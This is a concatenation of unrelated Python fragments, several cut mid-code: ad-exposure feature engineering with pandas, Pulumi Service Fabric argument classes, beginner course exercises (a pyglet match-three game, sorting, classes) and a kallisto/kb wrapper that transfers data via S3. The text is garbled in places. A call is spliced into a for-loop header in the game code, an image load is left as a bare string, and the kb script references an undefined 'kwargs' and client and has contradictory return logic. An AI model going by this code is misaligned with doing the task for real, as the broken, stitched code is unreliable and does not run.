test_flag == 1: test_flag = 0 test_res = l/2 else: test_res = np.row_stack((test_res, l/2)) print(test_res) return np.array(train_res1), np.array(val_res), np.array(test_res) def one_feature_exposure(train, val, test, fea, date): # 返回曝光的最大值,最小值,均值,中位数四个值, # 返回bid的最大值,最小值,均值,中位数四个值, val_res = [] test_res = [] train_res = [] val_res2 = [] test_res2 = [] train_res2 = [] train_res3 = [] Train = pd.concat([train, val]) num1 = train[train['Reqday'] == '2_16'].shape[0] for i in range(num1): train_res.append([8, 8, 8, 8]) train_res2.append([8, 8, 8, 8]) train_count = train[train['Reqday'] == '2_16'] train_compute = train[train['Reqday'] == '2_17'] exposure_dict = {} bid_dict = {} for value in train_count[fea].values: if value not in exposure_dict: train1 = train_count[train_count[fea] == value]['exposure'].values exposure_dict[value] = [] bid_dict[value] = [] exposure_dict[value].append(np.max(train1)) exposure_dict[value].append(np.min(train1)) exposure_dict[value].append(np.mean(train1)) exposure_dict[value].append(np.median(train1)) train2 = train_count[train_count[fea] == value]['adBid'].values bid_dict[value].append(np.max(train2)) bid_dict[value].append(np.min(train2)) bid_dict[value].append(np.mean(train2)) bid_dict[value].append(np.median(train2)) if '-1' not in exposure_dict: exposure_dict['-1'] = [8, 8, 8, 8] bid_dict['-1'] = [8, 8, 8, 8] for value in train_compute[fea].values: if value not in exposure_dict: value = '-1' train_res.append(exposure_dict[value]) train_res2.append(bid_dict[value]) for i in range(len(date) - 2): day1 = date[i+2] day2 = date[i+1] day3 = date[i] train1 = Train[Train['Reqday'] == day3] train2 = Train[Train['Reqday'] == day2] train_compute = Train[Train['Reqday'] == day1] train_count = pd.concat([train1, train2]) exposure_dict = {} bid_dict = {} for value in train_count[fea].values: if value not in exposure_dict: exposure_dict[value] = [] bid_dict[value] = [] train1 = train_count[train_count[fea] == value]['exposure'].values exposure_dict[value].append(np.max(train1)) exposure_dict[value].append(np.min(train1)) exposure_dict[value].append(np.mean(train1)) exposure_dict[value].append(np.median(train1)) train2 = train_count[train_count[fea] == value]['adBid'].values bid_dict[value].append(np.max(train2)) bid_dict[value].append(np.min(train2)) bid_dict[value].append(np.mean(train2)) bid_dict[value].append(np.median(train2)) if '-1' not in exposure_dict: exposure_dict['-1'] = [8, 8, 8, 8] bid_dict['-1'] = [8, 8, 8, 8] for value in train_compute[fea].values: if value not in exposure_dict: value = '-1' train_res.append(exposure_dict[value]) train_res2.append(bid_dict[value]) train_res1 = train_res[:(Train.shape[0] - val.shape[0])] val_res =
placement policy for a service fabric service. Following are the possible values. Expected value is 'PreferredPrimaryDomain'. """ return pulumi.get(self, "type") @type.setter def type(self, value: pulumi.Input[str]): pulumi.set(self, "type", value) @pulumi.input_type class ServicePlacementRequireDomainDistributionPolicyArgs: def __init__(__self__, *, domain_name: pulumi.Input[str], type: pulumi.Input[str]): """ Describes the policy to be used for placement of a Service Fabric service where two replicas from the same partition should never be placed in the same fault or upgrade domain. While this is not common it can expose the service to an increased risk of concurrent failures due to unplanned outages or other cases of subsequent/concurrent failures. As an example, consider a case where replicas are deployed across different data center, with one replica per location. In the event that one of the datacenters goes offline, normally the replica that was placed in that datacenter will be packed into one of the remaining datacenters. If this is not desirable then this policy should be set. :param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy. :param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values. Expected value is 'RequiredDomainDistribution'. """ pulumi.set(__self__, "domain_name", domain_name) pulumi.set(__self__, "type", 'RequiredDomainDistribution') @property @pulumi.getter(name="domainName") def domain_name(self) -> pulumi.Input[str]: """ The name of the domain that should used for placement as per this policy. """ return pulumi.get(self, "domain_name") @domain_name.setter def domain_name(self, value: pulumi.Input[str]): pulumi.set(self, "domain_name", value) @property @pulumi.getter def type(self) -> pulumi.Input[str]: """ The type of placement policy for a service fabric service. Following are the possible values. Expected value is 'RequiredDomainDistribution'. """ return pulumi.get(self, "type") @type.setter def type(self, value: pulumi.Input[str]): pulumi.set(self, "type", value) @pulumi.input_type class ServicePlacementRequiredDomainPolicyArgs: def __init__(__self__, *, domain_name: pulumi.Input[str], type: pulumi.Input[str]): """ Describes the policy to be used for placement of a Service Fabric service where the instances or replicas of that service must be placed in a particular domain. :param pulumi.Input[str] domain_name: The name of the domain that should used for placement as per this policy. :param pulumi.Input[str] type: The type of placement policy for a service fabric service. Following are the possible values. Expected value is 'RequiredDomain'. """ pulumi.set(__self__, "domain_name", domain_name) pulumi.set(__self__, "type", 'RequiredDomain') @property @pulumi.getter(name="domainName") def domain_name(self) -> pulumi.Input[str]: """ The name of the domain that should used for placement as per this policy. """ return pulumi.get(self, "domain_name") @domain_name.setter def domain_name(self, value: pulumi.Input[str]): pulumi.set(self, "domain_name", value) @property @pulumi.getter def type(self) -> pulumi.Input[str]: """ The type of placement policy for a service fabric service. Following are the possible values. Expected value is 'RequiredDomain'. """ return pulumi.get(self, "type") @type.setter def type(self, value: pulumi.Input[str]): pulumi.set(self, "type", value) @pulumi.input_type class ServiceTypeHealthPolicyArgs: def __init__(__self__, *, max_percent_unhealthy_partitions_per_service: pulumi.Input[int], max_percent_unhealthy_replicas_per_partition: pulumi.Input[int], max_percent_unhealthy_services: pulumi.Input[int]): """ Represents the health policy used to evaluate the health of services belonging to a service type. :param pulumi.Input[int] max_percent_unhealthy_partitions_per_service: The maximum allowed percentage of unhealthy partitions per service. The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error. If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service. The computation rounds up to tolerate one failure on small numbers of partitions. :param pulumi.Input[int] max_percent_unhealthy_replicas_per_partition: The maximum allowed percentage of unhealthy replicas per partition. The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error. If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition. The computation rounds up to tolerate one failure on small numbers of replicas. :param pulumi.Input[int] max_percent_unhealthy_services: The maximum allowed percentage of unhealthy services. The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error. If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning. This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type. The computation rounds up to tolerate one failure on small numbers of services. """ pulumi.set(__self__, "max_percent_unhealthy_partitions_per_service", max_percent_unhealthy_partitions_per_service) pulumi.set(__self__, "max_percent_unhealthy_replicas_per_partition", max_percent_unhealthy_replicas_per_partition) pulumi.set(__self__, "max_percent_unhealthy_services", max_percent_unhealthy_services) @property @pulumi.getter(name="maxPercentUnhealthyPartitionsPerService") def max_percent_unhealthy_partitions_per_service(self) -> pulumi.Input[int]: """ The maximum allowed percentage of unhealthy partitions per service. The percentage represents the maximum tolerated percentage of partitions that can be unhealthy before the service is considered in error. If the percentage is respected but there is at least one unhealthy partition, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy partitions over the total number of partitions in the service. The computation rounds up to tolerate one failure on small numbers of partitions. """ return pulumi.get(self, "max_percent_unhealthy_partitions_per_service") @max_percent_unhealthy_partitions_per_service.setter def max_percent_unhealthy_partitions_per_service(self, value: pulumi.Input[int]): pulumi.set(self, "max_percent_unhealthy_partitions_per_service", value) @property @pulumi.getter(name="maxPercentUnhealthyReplicasPerPartition") def max_percent_unhealthy_replicas_per_partition(self) -> pulumi.Input[int]: """ The maximum allowed percentage of unhealthy replicas per partition. The percentage represents the maximum tolerated percentage of replicas that can be unhealthy before the partition is considered in error. If the percentage is respected but there is at least one unhealthy replica, the health is evaluated as Warning. The percentage is calculated by dividing the number of unhealthy replicas over the total number of replicas in the partition. The computation rounds up to tolerate one failure on small numbers of replicas. """ return pulumi.get(self, "max_percent_unhealthy_replicas_per_partition") @max_percent_unhealthy_replicas_per_partition.setter def max_percent_unhealthy_replicas_per_partition(self, value: pulumi.Input[int]): pulumi.set(self, "max_percent_unhealthy_replicas_per_partition", value) @property @pulumi.getter(name="maxPercentUnhealthyServices") def max_percent_unhealthy_services(self) -> pulumi.Input[int]: """ The maximum allowed percentage of unhealthy services. The percentage represents the maximum tolerated percentage of services that can be unhealthy before the application is considered in error. If the percentage is respected but there is at least one unhealthy service, the health is evaluated as Warning. This is calculated by dividing the number of unhealthy services of the specific service type over the total number of services of the specific service type. The computation rounds up to tolerate one failure on small numbers of services. """ return pulumi.get(self, "max_percent_unhealthy_services") @max_percent_unhealthy_services.setter def max_percent_unhealthy_services(self, value: pulumi.Input[int]): pulumi.set(self, "max_percent_unhealthy_services", value) @pulumi.input_type class SettingsParameterDescriptionArgs: def __init__(__self__, *, name: pulumi.Input[str], value: pulumi.Input[str]): """ Describes a parameter in fabric settings of the cluster. :param pulumi.Input[str] name: The parameter name of fabric setting. :param pulumi.Input[str] value: The parameter value of fabric setting. """ pulumi.set(__self__, "name", name) pulumi.set(__self__, "value", value) @property @pulumi.getter def name(self) -> pulumi.Input[str]: """ The parameter name of fabric setting. """ return pulumi.get(self, "name") @name.setter def name(self, value: pulumi.Input[str]): pulumi.set(self, "name", value) @property @pulumi.getter def value(self) -> pulumi.Input[str]: """ The parameter value of fabric setting. """ return pulumi.get(self, "value") @value.setter def value(self, value: pulumi.Input[str]): pulumi.set(self, "value", value) @pulumi.input_type class SettingsSectionDescriptionArgs: def __init__(__self__, *, name: pulumi.Input[str], parameters: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]): """ Describes a section in the fabric settings of the cluster. :param pulumi.Input[str] name: The section name of the fabric settings. :param pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]] parameters: The collection of parameters in the section. """ pulumi.set(__self__, "name", name) pulumi.set(__self__, "parameters", parameters) @property @pulumi.getter def name(self) -> pulumi.Input[str]: """ The section name of the fabric settings. """ return pulumi.get(self, "name") @name.setter def name(self, value: pulumi.Input[str]): pulumi.set(self, "name", value) @property @pulumi.getter def parameters(self) -> pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]: """ The collection of parameters in the section. """ return pulumi.get(self, "parameters") @parameters.setter def parameters(self, value: pulumi.Input[Sequence[pulumi.Input['SettingsParameterDescriptionArgs']]]): pulumi.set(self, "parameters", value) @pulumi.input_type class SingletonPartitionSchemeArgs: def __init__(__self__, *, partition_scheme: pulumi.Input[str]): """ Describes the partition scheme of a singleton-partitioned, or non-partitioned service. :param pulumi.Input[str] partition_scheme: Enumerates the ways that a service can be partitioned. Expected value is 'Singleton'. """ pulumi.set(__self__, "partition_scheme", 'Singleton') @property @pulumi.getter(name="partitionScheme") def partition_scheme(self) -> pulumi.Input[str]: """ Enumerates the ways that a service can be partitioned. Expected value is 'Singleton'. """ return pulumi.get(self, "partition_scheme") @partition_scheme.setter def partition_scheme(self, value:
<reponame>jlmucb/class_notes<filename>IoT/code/py/p3.py def calc_miles(gallons, mpg=20.0): return gallons*mpg print( calc_miles(10.0, 15.0) ) print( calc_miles(10.0) ) for line in infile: #STUFF DELETED HERE m, d, y = date.split('/') month = int(m) day = int(d) year = int(y) #Put data into list datalist.append([day, month, year, lowtemp, hightemp, rainfall]) #STUFF DELETED HERE #Find historical data for date gooddata = [] for singleday in datalist: if (singleday[0] == month) and (singleday[1] == day): gooddata.append([singleday[2], singleday[3], singleday[4], singleday[5]]) from random import choice import pyglet window = pyglet.window.Window(width=400, height = 450, caption="GameWindow") Im1 = pyglet.image.load('BlueTri.jpg') Im2 = pyglet.image.load('PurpleStar.jpg') Im3 = ('OrangeDiamond.jpg') Im4 = pyglet.image.load('YellowCircle.jpg') Im5 = pyglet.image.load('RedHex.jpg') def InitializeGrid(board): #Initialize Grid by reading in from file for i in range(8): for j in range(8): board[i][j] = choice(['A', 'B', 'C', 'D', 'E']) def Initialize(board): #Initialize game #Initialize grid InitializeGrid(board) #Initialize score global score score = 0 #Initialize turn number global turn turn = 1 #Set up graphical info def ContinueGame(current_score, goal_score = 100): #Return false if game should end, true if game is not over if (current_score >= goal_score): return False else: return True def SwapPieces(board, move): #Swap objects in two positions temp = board[move[0]][move[1]] board[move[0]][move[1]] = board[move[2]][move[3]] board[move[2]][move[3]] = temp def RemovePieces(board): #Remove 3-in-a-row and 3-in-a-column pieces #Create board to store remove-or-not remove = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]] #Go through rows for i in range(8): for j inpyglet.image.load range(6): if (board[i][j] == board[i][j+1]) and (board[i][j] == board[i][j+2]): #three in a row are the same! remove[i][j] = 1; remove[i][j+1] = 1; remove[i][j+2] = 1; #Go through columns for j in range(8): for i in range(6): if (board[i][j] == board[i+1][j]) and (board[i][j] == board[i+2][j]): #three in a row are the same! remove[i][j] = 1; remove[i+1][j] = 1; remove[i+2][j] = 1; #Eliminate those marked global score removed_any = False for i in range(8): for j in range(8): if remove[i][j] == 1: board[i][j] = 0 score += 1 removed_any = True return removed_any def DropPieces(board): #Drop pieces to fill in blanks for j in range(8): #make list of pieces in the column listofpieces = [] for i in range(8): if board[i][j] != 0: listofpieces.append(board[i][j]) #copy that list into colulmn for i in range(len(listofpieces)): board[i][j] = listofpieces[i] #fill in remainder of column with 0s for i in range(len(listofpieces), 8): board[i][j] = 0 def FillBlanks(board): #Fill blanks with random pieces for i in range(8): for j in range(8): if (board[i][j] == 0): board[i][j] = choice(['A', 'B', 'C', 'D', 'E']) def Update(board, move): #Update the board according to move SwapPieces(board, move) pieces_eliminated = True while pieces_eliminated: pieces_eliminated = RemovePieces(board) DropPieces(board) FillBlanks(board) @window.event def on_draw(): window.clear() for i in range(7,-1,-1): #Draw each row y = 50+50*i for j in range(8): #draw each piece, first getting position x = 50*j if board[i][j] == 'A': Im1.blit(x,y) elif board[i][j] == 'B': Im2.blit(x,y) elif board[i][j] == 'C': Im3.blit(x,y) elif board[i][j] == 'D': Im4.blit(x,y) elif board[i][j] == 'E': Im5.blit(x,y) label = pyglet.text.Label('Turn: '+str(turn)+ 'Score: '+str(score), font_name='Arial', font_size=18, x=20, y = 10) label.draw() @window.event def on_mouse_press(x, y, button, modifiers): #Get the starting cell global startx global starty startx = x starty = y @window.event def on_mouse_release(x, y, button, modifiers): #Get starting and ending cell and see if they are adjacent startcol = startx//50 startrow = (starty-50)//50 endcol = x//50 endrow = (y-50)//50 #Check whether ending is adjacent to starting and if so, make move. if ((startcol==endcol and startrow==endrow - 1) or (startcol==endcol and startrow==endrow+1) or (startrow==endrow and startcol==endcol-1) or (startrow==endrow and startcol==endcol+1)): Update(board,[startrow,startcol,endrow,endcol]) global turn turn += 1 #See if game is over if not ContinueGame(score): print("You won in", turn, "turns!") exit() #State main variables score = 100 turn = 100 goalscore = 100 board = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]] #Initialize game Initialize(board) pyglet.app.run() from matplotlib import pyplot pyplot.plot([0,1,2,3,4,5], [0,1,4,9,16,25]) pyplot.axis([0,5,0,25]) pyplot.show() from matplotlib.pyplot import plot, show #Set initial conditions time = 0 balance = 1000 #Set list to store data timelist=[time] balancelist=[balance] while (time < 10): #Increase balance and time balance += balance*0.03 time += 1 #Store time and balance in lists timelist.append(time) balancelist.append(balance) #Output the simulation results for i in range(len(timelist)): print("Year:", timelist[i], " Balance:", balancelist[i]) plot(timelist, balancelist) show() class BankAccount: balance = 0.0 def __init__(self): self.deposits = [] checking_account = BankAccount() savings_account = BankAccount() checking_account.deposits.append(100.0) print(savings_account.deposits) class FootballPlayer: name = "<NAME>" team = "None" years_in_league = 0 def printPlayer(self): print(self.name+" playing for the "+self.team+":") class Quarterback(FootballPlayer): pass_attempts = 0 completions = 0 pass_yards = 0 def completionRate(self): return self.completions/self.pass_attempts def yardsPerAttempt(self): return self.pass_yards/self.pass_attempts class RunningBack(FootballPlayer): rushes = 0 rush_yards = 0 def yardsPerRush(self): return self.rush_yards/self.rushes class FootballPlayer: name = "<NAME>" team = "None" years_in_league = 0 def printPlayer(self): print(self.name+" playing for the "+self.team+":") def isGood(self): print("Error! isGood is not defined!") return False class Quarterback(FootballPlayer): pass_attempts = 0 completions = 0 pass_yards = 0 def completionRate(self): return self.completions/self.pass_attempts def yardsPerAttempt(self): return self.pass_yards/self.pass_attempts def isGood(self): return (self.yardsPerAttempt() > 7) class RunningBack(FootballPlayer): rushes = 0 rush_yards = 0 def yardsPerRush(self): return self.rush_yards/self.rushes def isGood(self): return (self.yardsPerRush() > 4) book_queue = [] book_queue.append(medium_book) book_queue.append(short_book) book_queue.append(long_book) next_book = book_queue.pop(0) def isIn(L, v): i= 0 while (i<len(L)): if L[i] == v: return True else: i += 1 return False favorite_foods = ['pizza', 'barbeque', 'gumbo', 'chicken and dumplings', 'pecan pie', 'ice cream'] print(isIn(favorite_foods, 'gumbo')) print(isIn(favorite_foods, 'coconut')) OUTPUT: True False def mergeSort(L): n = len(L) if n <= 1: return L1 = L[:n//2] L2 = L[n//2:] mergeSort(L1) mergeSort(L2) merge(L, L1, L2) return def merge(L, L1, L2): i= 0 j= 0 k= 0 while (j < len(L1)) or (k < len(L2)): if j < len(L1): if k < len(L2): #we are not at the end of L1 or L2, so pull the smaller value if L1[j] < L2[k]: L[i] = L1[j] j += 1 else: L[i] = L2[k] k += 1 else: #we are at the end of L2, so just pull from L1 L[i] = L1[j] j += 1 else: #we are at the end of L1, so just pull from L2 L[i] = L2[k] k += 1 i += 1 return def merge(L, L1, L2): i= 0 j= 0 k= 0 while (j < len(L1)) or (k < len(L2)): if j < len(L1): if k < len(L2): #we are not at the end of L1 or L2, so pull the smaller value if L1[j] < L2[k]: L[i] = L1[j] j += 1 else: L[i] = L2[k] k += 1 else: #we are at the end of L2, so just pull from L1 L[i] = L1[j] j += 1 else: #we are at the end of L1, so just pull from L2 L[i] = L2[k] k += 1 i += 1 return class node: def __init__(self, name, parent=-1): self._name = name self._parent = parent self._left = -1 self._right = -1 def getName(self): return self._name def getParent(self): return self._parent def getLeft(self): return self._left def getRight(self): return self._right def setParent(self, p): self._parent = p def setLeft(self, l): self._left = l def setRight(self, r): self._right = r class node: def __init__(self, name): self._name = name self._friends = [] self._status = 0 self._discoveredby = 0 def getName(self): return self._name def getFriends(self): return self._friends def addFriend(self, friend_index): self._friends.append(friend_index) def isUnseen(self): if self._status == 0: return True else: return False def isSeen(self): if self._status == 1: return True
#!/usr/bin/env python import argparse import datetime import os import pathlib import posixpath import re import subprocess import tarfile import time import sys import shutil import glob from collections import defaultdict import utilities.log_util as ut_log import utilities.s3_util as s3u import boto3 from boto3.s3.transfer import TransferConfig def get_default_requirements(): return argparse.Namespace(vcpus=16, memory=64000, storage=500, ecr_image="velocyto") def display_info(logger): """Displays kb, kallisto and bustools version + citation information, along with a brief description and examples. Keyword Argument: mainlogger - Logger of main function (type: logging.Logger) """ info_command = ["kb", "info"] # if ut_log.log_command( # logger, # info_command, # stdout=subprocess.PIPE, # stderr=subprocess.STDOUT, # shell=True, # ): # logger.info("Failed to view kb_python package details") # sys.exit(1) proc = subprocess.run(" ".join(info_command), **kwargs) if proc.returncode != 0: raise RuntimeError("`info` command failed") if proc.stdout and isinstance(proc.stdout, str): raise RuntimeError(proc.stdout) elif isinstance(proc.stdout, bytes): raise RuntimeError(proc.stdout.decode()) return True else: return False def display_technologies(logger): """Displays a list of supported technologies along with whether kb provides a whitelist for that technology and the FASTQ argument order for kb count. Keyword Argument: mainlogger - Logger of main function (type: logging.Logger) """ technology_command = ["kb", "--list"] if ut_log.log_command( logger, technology_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, ): logger.info( "Failed to view single-cell technology list compatible with the kb_python package" ) sys.exit(1) # proc = subprocess.run(" ".join(technology_command), **kwargs) # if proc.returncode != 0: # raise RuntimeError("`--list` command failed") # if proc.stdout and isinstance(proc.stdout, str): # raise RuntimeError(proc.stdout) # elif isinstance(proc.stdout, bytes): # raise RuntimeError(proc.stdout.decode()) # return True # else: # return False def parse_ref(args, run_dir, logger): """Parser for the `ref` command. Build kallisto index files. Keyword Arguments: args -- Command-line arguments dictionary, as parsed by argparse (type: dict) run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path) logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger) """ # Build paths on the EC2 instance to store inputs and outputs of kallisto index building. Download kallisto index building files from the AWS S3 bucket to the EC2 instance, if not using the in-built kallisto indices kallisto_index_dir = run_dir / "kallisto_index" kallisto_index_inputs = kallisto_index_dir / "inputs" kallisto_index_outputs = kallisto_index_dir / "outputs" kallisto_index_inputs.mkdir(parents=True) kallisto_index_outputs.mkdir(parents=True) kb_ref_paths = dict() s3_kb_ref = dict() kb_ref_output_to_s3 = dict() if "-d" not in sys.argv: if "--workflow" in sys.argv and "kite" in sys.argv: kb_ref_paths["feature_path"] = kallisto_index_inputs / os.path.basename( args.feature ) ( s3_kb_ref["s3_feature_bucket"], s3_kb_ref["s3_feature_prefix"], ) = s3u.s3_bucket_and_key(args.feature) s3c.download_file( Bucket=s3_kb_ref["s3_feature_bucket"], Key=s3_kb_ref["s3_feature_prefix"], Filename=str(kb_ref_paths["feature_path"]), ) for arg in ["fasta", "gtf"]: kb_ref_paths[arg + "_path"] = kallisto_index_inputs / os.path.basename( getattr(args, arg) ) ( s3_kb_ref["s3_" + arg + "_bucket"], s3_kb_ref["s3_" + arg + "_prefix"], ) = s3u.s3_bucket_and_key(getattr(args, arg)) s3c.download_file( Bucket=s3_kb_ref["s3_" + arg + "_bucket"], Key=s3_kb_ref["s3_" + arg + "_prefix"], Filename=str(kb_ref_paths[arg + "_path"]), ) for arg in ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"]: if arg in sys.argv: arg = arg[2:] if arg == "--tmp" else arg[1:] print( f"testing purpose - see if getattr(args, arg) output all argument names from '-i', '-g', '-f1', '-f2', '-c1', '-c2', '--tmp': {getattr(args, arg)}" ) # testing purpose if arg == "tmp": kb_ref_paths[arg + "_path"] = kallisto_index_dir / "alter_tmp" s3_kb_ref["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key( getattr(args, arg) )[0] s3_kb_ref["s3_" + arg + "_prefix"] = posixpath.join( s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp" ) else: kb_ref_paths[arg + "_path"] = kallisto_index_outputs / os.path.basename( getattr(args, arg) ) ( s3_kb_ref["s3_" + arg + "_bucket"], s3_kb_ref["s3_" + arg + "_prefix"], ) = s3u.s3_bucket_and_key(getattr(args, arg)) # Build the command of running `kb ref` to generate kallisto index files ref_input_boolean = ["--lamanno", "--overwrite", "--keep-tmp", "--verbose"] ref_input_upload_required = ["-i", "-g", "-f1", "-f2", "-c1", "-c2", "--tmp"] ref_input_left_args = ["-d", "-n", "-k", "--workflow"] kb_ref_command = ["kb", "ref"] for input in ["fasta", "gtf"]: if "-d" not in sys.argv: print( f"testing purpose: `ref` positional argument: {getattr(args, input)}" ) # testing purpose if "--workflow" in sys.argv and "kite" in sys.argv: print( f"testing purpose: `ref` positional argument: {getattr(args, input)}" ) # testing purpose kb_ref_command += [str(kb_ref_paths["feature_path"])] kb_ref_command += [str(kb_ref_paths[input + "_path"])] for input in ref_input_boolean: if input in sys.argv: kb_ref_command += [input] for input in ref_input_upload_required: if input in sys.argv: kb_ref_command += [ input, str(kb_ref_paths[input[2:] + "_path"]) if input == "--tmp" else str(kb_ref_paths[input[1:] + "_path"]), ] for input in ref_input_left_args: if input in sys.argv: kb_ref_command += [input, getattr(args, input)] print( f"testing purpose - check if kb_ref_command is of correct format: {kb_ref_command}" ) # testing purpose # Run the command to generate kallisto index files, and upload the output files on the EC2 instance back to AWS S3 kb_ref_failed = ut_log.log_command( logger, kb_ref_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, ) kb_ref_t_config = TransferConfig( use_threads=False ) # testing purpose: comment this line if this runs into error. kallisto indices are not pretty big and don't necessarily need a transfer config if kb_ref_failed: raise RuntimeError("kallisto index building failed") else: kb_ref_upload_files = glob.glob(str(kallisto_index_outputs / "*")) print( f"testing purpose - check kallisto index files: {kb_ref_upload_files}" ) # testing purpose for file in kb_ref_upload_files: logger.info( f"Uploading {os.path.basename(file)} from the EC2 instance to AWS S3" ) s3c.upload_file( Filename=file, Bucket=kb_ref_output_to_s3[file][0], Key=kb_ref_output_to_s3[file][1], Config=kb_ref_t_config, ) time.sleep(30) print( f"testing purpose - see if kb_ref upload_file function intakes correct bucket and prefix names for kallisto index output files: {kb_ref_output_to_s3[file][0]}, {kb_ref_output_to_s3[file][1]}" ) # testing purpose return def parse_count(args, run_dir, logger): """Parser for the `count` command. Data quantification with kallisto and bustools. Keyword Arguments: args -- Command-line arguments dictionary, as parsed by argparse (type: dict) run_dir -- Path on the EC2 instance under which jobs are run (type: pathlib.Path) logger -- Logger object that exposes the interface the code directly uses (type: logging.Logger) """ # Build paths on the EC2 instance to store inputs and outputs of kb data quantification results. kb_count_dir = run_dir / "kb_count" kb_fastqs = kb_count_dir / "fastqs" kb_count_inputs = kb_count_dir / "inputs" kb_count_outputs = kb_count_dir / "outputs" kb_fastqs.mkdir(parents=True) kb_count_inputs.mkdir(parents=True) kb_count_outputs.mkdir(parents=True) kb_count_paths = dict() s3_kb_count = dict() for arg in ["--tmp", "-o", "-w", "-i", "-g", "-c1", "-c2"]: if arg in sys.argv: arg = arg[2:] if arg == "--tmp" else arg[1:] print( f"testing purpose - see if getattr(args, arg) returns the correct values for `kb count` inputs: {getattr(args, arg)}" ) # testing purpose if arg == "tmp": kb_count_paths[arg + "_path"] = kb_count_dir / "alter_tmp" s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join( s3u.s3_bucket_and_key(getattr(args, arg))[1], "alter_tmp" ) elif arg == "o": kb_count_paths[arg + "_path"] = kb_count_outputs s3_kb_count["s3_" + arg + "_prefix"] = posixpath.join( s3u.s3_bucket_and_key(getattr(args, arg))[1], "outputs" ) else: kb_count_paths[arg + "_path"] = kb_count_inputs / os.path.basename( getattr(args, arg) ) ( s3_kb_count["s3_" + arg + "_bucket"], s3_kb_count["s3_" + arg + "_prefix"], ) = s3u.s3_bucket_and_key(getattr(args, arg)) s3c.download_file( Bucket=s3_kb_count["s3_" + arg + "_bucket"], Key=s3_kb_count["s3_" + arg + "_prefix"], Filename=str(kb_count_paths[arg + "_path"]), ) s3_kb_count["s3_" + arg + "_bucket"] = s3u.s3_bucket_and_key( getattr(args, arg) )[0] # Download fastq files from the AWS S3 bucket to the EC2 instance. ( kb_count_paths["fastqs_path"], s3_kb_count["s3_fastqs_bucket"], s3_kb_count["s3_fastqs_prefix"], ) = (dict(), dict(), dict()) kb_count_fastq_files_paths, s3_kb_count_fastqs_bucket, s3_kb_count_fastqs_prefix = ( kb_count_paths["fastqs_path"], s3_kb_count["s3_fastqs_bucket"], s3_kb_count["s3_fastqs_prefix"], ) s3_fastq_folder_bucket, s3_fastq_folder_prefix = s3u.s3_bucket_and_key( args.fastq_folder ) s3_fastq_files_prefix = list( s3u.get_files(bucket=s3_fastq_folder_bucket, prefix=s3_fastq_folder_prefix) )[1:] print( "testing purpose - see if all fastq files prefix are extracted: {s3_fastq_files_prefix}" ) # testing purpose fastq_format = re.compile("([^/]+)_R\d(?:_\d+)?.fastq.gz$") for fastq_prefix in s3_fastq_files_prefix: if not fastq_format.search(os.path.basename(fastq_prefix)): continue kb_count_fastq_files_paths[ os.path.basename(fastq_prefix) ] = kb_fastqs / os.path.basename(fastq_prefix) s3_kb_count_fastqs_bucket[ os.path.basename(fastq_prefix) ] = s3_fastq_folder_bucket s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)] = fastq_prefix fastq_t_config = TransferConfig( use_threads=False ) # testing purpose: comment this line if this runs into error. s3c.download_file( Bucket=s3_kb_count_fastqs_bucket[os.path.basename(fastq_prefix)], Key=s3_kb_count_fastqs_prefix[os.path.basename(fastq_prefix)], Filename=str(kb_count_fastq_files_paths[os.path.basename(fastq_prefix)]), Config=fastq_t_config, ) # Build the command of running `kb count` to generate count matrices count_input_boolean = [ "--keep-tmp", "--verbose", "--mm", "--tcc", "--overwrite", "--lamanno", "--nucleus", "--loom", "--h5ad", ] count_input_file_transfer_required = ["--tmp", "-o", "-w"] count_input_kb_indices = ["-i", "-g", "-c1", "-c2"] count_input_left_args = ["-t", "-m", "--workflow", "--filter", "-x"] kb_count_command = ["kb", "count"] for fastq_path in kb_count_fastq_files_paths.values(): print( f"testing purpose - view the paths of individual fastqs on the EC2 instance, i.e. values of dictionary `kb_count_fastq_files_paths`: {kb_count_fastq_files_paths.values()}" ) # testing purpose kb_count_command += [str(fastq_path)] for input in count_input_boolean: if input in sys.argv: kb_count_command += [input] for input in count_input_file_transfer_required: if input in sys.argv: kb_count_command += [ input, str(kb_count_paths[input[2:] + "_path"]) if input == "--tmp" else str(kb_count_paths[input[1:] + "_path"]), ] for input in count_input_kb_indices: if input in sys.argv: kb_count_command += [input, str(kb_count_paths[input[1:] + "_path"])] for input
